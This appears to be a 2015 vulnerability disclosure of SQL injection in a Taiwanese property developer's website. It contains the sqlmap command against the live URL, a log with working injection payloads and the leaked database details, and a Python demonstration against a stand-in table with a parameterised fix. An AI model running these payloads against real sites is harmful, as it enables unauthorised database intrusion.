2015-03-05: Details reported to the vendor; awaiting the vendor's response
2015-03-10: Vendor chose to ignore the vulnerability; details disclosed to the public

SQL injection at a Taiwanese real-estate developer
sqlmap.py -u "http://www.3hlife.com.tw/manage_show.php?desn=15" --dbs --passwords --current-user --current-db --is-dba

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state

[*] starting at 22:50:59

[22:51:00] [INFO] testing connection to the target URL
[22:51:01] [INFO] testing if the target URL is stable. This can take a couple of seconds
[22:51:03] [INFO] target URL is stable
[22:51:03] [INFO] testing if GET parameter 'desn' is dynamic
[22:51:03] [INFO] confirming that GET parameter 'desn' is dynamic
[22:51:04] [INFO] GET parameter 'desn' is dynamic
[22:51:07] [INFO] heuristic (basic) test shows that GET parameter 'desn' might be injectable (possible DBMS: 'MySQL')
[22:51:07] [INFO] testing for SQL injection on GET parameter 'desn'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n]
[22:51:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:51:10] [WARNING] reflective value(s) found and filtering out
[22:51:12] [INFO] GET parameter 'desn' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[22:51:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:51:12] [INFO] GET parameter 'desn' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[22:51:12] [INFO] testing 'MySQL inline queries'
[22:51:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:51:14] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[22:51:20] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[22:51:20] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[22:51:20] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[22:52:10] [INFO] GET parameter 'desn' is 'MySQL > 5.0.11 AND time-based blind' injectable
[22:52:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[22:52:10] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:52:12] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for
[22:52:14] [INFO] target URL appears to have 9 columns in query
[22:52:37] [INFO] GET parameter 'desn' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[22:52:39] [WARNING] automatically patching output having last char trimmed
GET parameter 'desn' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 28 HTTP(s) requests:
---
Place: GET
Parameter: desn
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: desn=15 AND 4977=4977

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: desn=15 AND (SELECT 3559 FROM(SELECT COUNT(*),CONCAT(0x71676e6471,(SELECT (CASE WHEN (3559=3559) THEN 1 ELSE 0 END)),0x716b756a71,FLOOR(RAND(0)*2))x FROM INFOR

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: desn=15 UNION ALL SELECT NULL,NULL,CONCAT(0x71676e6471,0x636646596f6c48594b75,0x716b756a71),NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: desn=15 AND SLEEP(5)
---
[22:53:02] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:53:02] [INFO] fetching current user
current user:    'hlife3@%'
[22:53:03] [INFO] fetching current database
current database:    'hlife3'
[22:53:04] [INFO] testing if current user is DBA
[22:53:04] [INFO] fetching current user
[22:53:05] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA:    False
[22:53:05] [INFO] fetching database users password hashes
[22:53:08] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION tech
[22:53:08] [WARNING] the SQL query provided does not return any output
[22:53:14] [WARNING] the SQL query provided does not return any output
[22:53:14] [INFO] fetching database users
[22:53:15] [INFO] fetching number of password hashes for user 'hlife3'
[22:53:15] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:53:15] [INFO] retrieved:
[22:53:19] [INFO] retrieved:
[22:53:19] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[22:53:25] [WARNING] unable to retrieve the number of password hashes for user 'hlife3'
[22:53:25] [ERROR] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges over the relevant system dat
[22:53:25] [INFO] fetching database names
available databases [2]:
[*] hlife3
[*] information_schema

[22:53:26] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in
[22:53:26] [INFO] fetched data logged to text files under 'C:\Users\ADMINI~1\Desktop\???~1\???~1\SQLMAP~1.4\Bin\output\www.3hlife.com.tw'
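The log above shows the three probes that matter for this finding: a boolean oracle (desn=15 AND 4977=4977 returns the normal page, a false condition does not), an ORDER BY walk to count the 9 columns of the underlying SELECT, and a UNION ALL SELECT NULL,... row carrying a marker-wrapped value (the CONCAT(0x71676e6471,...,0x716b756a71) trick) so the extracted value can be picked out of the page. The example below is added here and is not part of the report or of sqlmap; it rebuilds that sequence against a constructed stand-in for manage_show.php (a 9-column table in an in-memory SQLite database, with the concatenated query the target evidently used) and runs the same probes against a parameterised version of the page, which defeats all three. Assumptions: the table name manage, its columns and rows, and the marker strings are invented; SQLite replaces the site's MySQL, so the MySQL-only error-based (FLOOR(RAND(0)*2)) and SLEEP(5) time-based techniques are not reproduced, and no trailing # comment is needed because the constructed query has nothing after the injected value.

```python
import sqlite3

# Constructed stand-in for the target: a 9-column table, as sqlmap counted.
SCHEMA = """
CREATE TABLE manage (desn INTEGER PRIMARY KEY, c2 TEXT, c3 TEXT, c4 TEXT,
                     c5 TEXT, c6 TEXT, c7 TEXT, c8 TEXT, c9 TEXT);
INSERT INTO manage VALUES (15,'a','b','c','d','e','f','g','h');
INSERT INTO manage VALUES (16,'i','j','k','l','m','n','o','p');
"""


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def vulnerable_page(db, desn):
    """The defect sqlmap found: the raw ?desn= value is pasted into the SQL."""
    try:
        return db.execute("SELECT * FROM manage WHERE desn=" + desn).fetchall()
    except sqlite3.Error:
        return None  # DB error surfaces as an empty/error page


def fixed_page(db, desn):
    """Hardened version: the value is type-checked and bound, never parsed as SQL."""
    try:
        return db.execute("SELECT * FROM manage WHERE desn=?", (int(desn),)).fetchall()
    except (ValueError, sqlite3.Error):
        return None


def boolean_blind_injectable(page, db, base="15"):
    """Boolean oracle: a TRUE condition reproduces the page, a FALSE one changes it."""
    normal = page(db, base)
    true_r = page(db, base + " AND 4977=4977")   # payload quoted in the log
    false_r = page(db, base + " AND 4977=4978")
    return normal == true_r and true_r != false_r


def count_columns(page, db, base="15", limit=20):
    """ORDER BY n succeeds while n <= number of selected columns, then errors."""
    n = 0
    for i in range(1, limit + 1):
        if page(db, base + " ORDER BY %d" % i) is None:
            break
        n = i
    return n


def union_extract(page, db, expr, ncols, base="15"):
    """UNION ALL SELECT NULL,...: put expr in column 3 between invented markers
    and recover it from whichever row carries them, as sqlmap's CONCAT does."""
    cols = ["NULL"] * ncols
    cols[2] = "'qgndq' || (" + expr + ") || 'qkujq'"
    rows = page(db, base + " UNION ALL SELECT " + ",".join(cols))
    for row in rows or []:
        val = row[2]
        if isinstance(val, str) and val.startswith("qgndq") and val.endswith("qkujq"):
            return val[5:-5]
    return None


def audit(page, db):
    """What a tester learns about one endpoint: (oracle?, column count, leaked value)."""
    injectable = boolean_blind_injectable(page, db)
    ncols = count_columns(page, db) if injectable else 0
    leaked = union_extract(page, db, "SELECT count(*) FROM manage", ncols) if ncols else None
    return injectable, ncols, leaked


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", audit(vulnerable_page, db))  # (True, 9, '2')
    print("fixed:     ", audit(fixed_page, db))       # (False, 0, None)
```

Against the concatenated page the run recovers the column count and pulls a value through the UNION row; against the bound-parameter page every probe produces the same error response, so the oracle never appears. The log's --passwords failure is consistent with this picture: the UNION channel works, but hlife3@% is not DBA and cannot read the system tables that hold the hashes.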
Severity: no impact (vendor ignored)
Ignored at: 2015-03-10 14:56
None yet